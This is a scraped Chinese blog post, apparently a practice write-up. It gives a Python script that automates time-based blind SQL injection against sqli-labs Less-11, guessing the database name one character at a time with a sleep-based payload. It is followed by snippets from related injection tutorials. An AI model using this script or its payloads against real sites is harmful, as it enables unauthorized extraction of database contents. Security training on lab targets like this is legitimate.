python编写sqli-labs11关脚本

最新推荐文章于 2023-01-10 20:58:33 发布
最新推荐文章于 2023-01-10 20:58:33 发布
阅读量315 收藏 1
点赞数
分类专栏: PHP代码审计 靶场学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34640691/article/details/109476404
版权

关于sql时间盲注爆破数据库名

未使用二分法


import requests
import datetime
headers = {
   
        "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
    }
def main():
    database = ""
    for n in range(1,9):
        for i in range(65,122):

            data = {
   
                "uname" : "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
                "passwd" : "11"

            }
            url = "http://192.168.0.100/sqli-labs-master/Less-11/"
            print(data)
            res = requests.post(url=url, data=data)
            if "admin" not in res.text:
                print(chr(i))
                database += str(chr(i))
                break
    print(database)

if __name__ == "__main__":
    starttime = datetime.datetime.now()
    main()
    endtime = datetime.datetime.now()
    print(endtime-starttime)

在这里插入图片描述

使用二分法

import requests
import datetime

#基于时间盲注使用ascii()函数
#1.编写盲注函数
#2.编写二分法函数
#3.编写ascii码转换函数

def
最低0.47元/天 解锁文章
kongytr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
从零开始的sqli-labs:十一
asdushf的博客
12-12 738
sqli-labs第十一 文章目录sqli-labs第十一前言判断注入类型 前言 十一开始出现登录框了 判断注入类型 这里注入类型的判断和前面差不太多,键还是要注意引号的闭合。 上下两边都输入1,发现登录失败上边输入 ...
sqli-lab简单python实现通
Williu的博客
01-04 3344
刚开始学习sql注入的菜鸟,简单写下自己的理解,sql注入,肯定和数据库有系了。利用sql语句来实现对数据库的入侵并获取数据或者破坏。 简单来说就是,利用sql语句来实现欺骗服务器,达到自己的目的。 比如: 我们要登录,需要输入用户名个和密码,然后后台数据库就会select SELECT * FROM users WHERE username = '张三' AND password = '123456' 然后我们改变他的查询方式,利用#或许–注释符 select * from users where u
Sqli-Labs(第11~第42)通笔记
weixin_54894046的博客
11-16 1080
sql注入lesson-11~31
sqli-labs-----第11
wyzhxhn的博客
11-09 1741
基于错误的POST型单引号字符型注入
sqli-labs全解---于盲注脚本编写--less7-10-4
cyynid的博客
01-10 580
盲注
sqli-labs的第15的布尔脚本(附代码分析)
skoyine的博客
05-02 1461
sqli-labs的第15布尔盲注脚本 因为最近在复习python,所以找个项目练练手,本人是个菜鸡,代码哪里有问题欢迎大佬指出 import requests import time host = "http://127.0.0.1/sqli-labs/Less-15/" def getDatabase(): # 获取数据库名 global host ans = '' # 最外面的循环是数据库名的字符长度,就是从第几个字符开始
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs布尔盲注和时间盲注相结合的脚本实现
m0_71299382的博客
11-09 272
sqli-labs布尔盲注和时间盲注相结合的脚本实现
sqli - labs - 11~12
m0_62102000的博客
07-15 158
sqli - labs - 11~12
sqli-labs boolean-based 盲注脚本
lixiangminghate的专栏
06-24 2308
sqli-labs从Less8到Less10是盲注练习:大家在看lcarmy做练习Less5时应该发现他手动输入了含有payload的url。的确,出于演示目的,显得条理很清晰;但是,这样做的重复工作量实在太大了,做完这样的练习至少需要不厌其烦的耐心!我觉得,做这类练习的人,或多或少写过代码,所以肯定会想到用脚本之类的工具代替重复工作。在此,提供一份脚本,实现以上目的。...
sqlmap命令_Python黑客攻防(八)运用sqlmap对sqli-labs进行SQL注入
weixin_39680208的博客
11-21 1094
前言:本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一进行SQL注入。sqli-labs靶场搭建->Python黑客攻防(六)sqli-labs环境搭建 ,后续九的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续卡的通步骤,在进行SQL注入前,我们先对sqlmap基础命令进行简单了解。sqlmap基础命令:sqlmap支持多种选项,-u 选项...
sqli-labs 11-20指南(详细解读)
weixin_44576725的博客
11-08 2266
前言:这里的卡多为post注入,故结合burpsuite进行抓包分析 Less-11 1、post注入,先在username输入admin’,password随便输,返回错误信息,从错误信息可知在username处应该有注入点,且可能为字符注入类型: 抓包: 2、加上万能语句or 1=1#,修改为admin’ or 1=1#,发现登陆成功,而且用户默认为dumb,可确定为字符型注入: 3、order by确定列数,确定为2: 4、开始爆破数据库、表名、列名: 数据库名: 表名: 列名
pythonsqli-labs15的二分法时间盲注
Programmonkeykin的博客
12-11 4087
1.导入库。 2.按ASCII码从小到大编写常见的符号、字符、数字。 3.编写实验对应库的地址,这里的url根据自己的实际状况而言。 编写get_length函数: 其二分盲注实现的完整代码如下: Payload="admin'andif((length(({}))={}),sleep(2),if((length(({}))>{}),sleep(3),1))#".format(data_payload,n,data_payload,n) 即,如果我们定义的数据长度n刚好等于我们..
sqli-labs第九脚本解释
最新发布
01-22
sqli-labs第九是一个延时盲注的挑战。在这个挑战中,你需要通过注入语句来判断条件是否为真,并通过延时来判断注入是否成功。...这是sqli-labs第九脚本解释。如果你有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值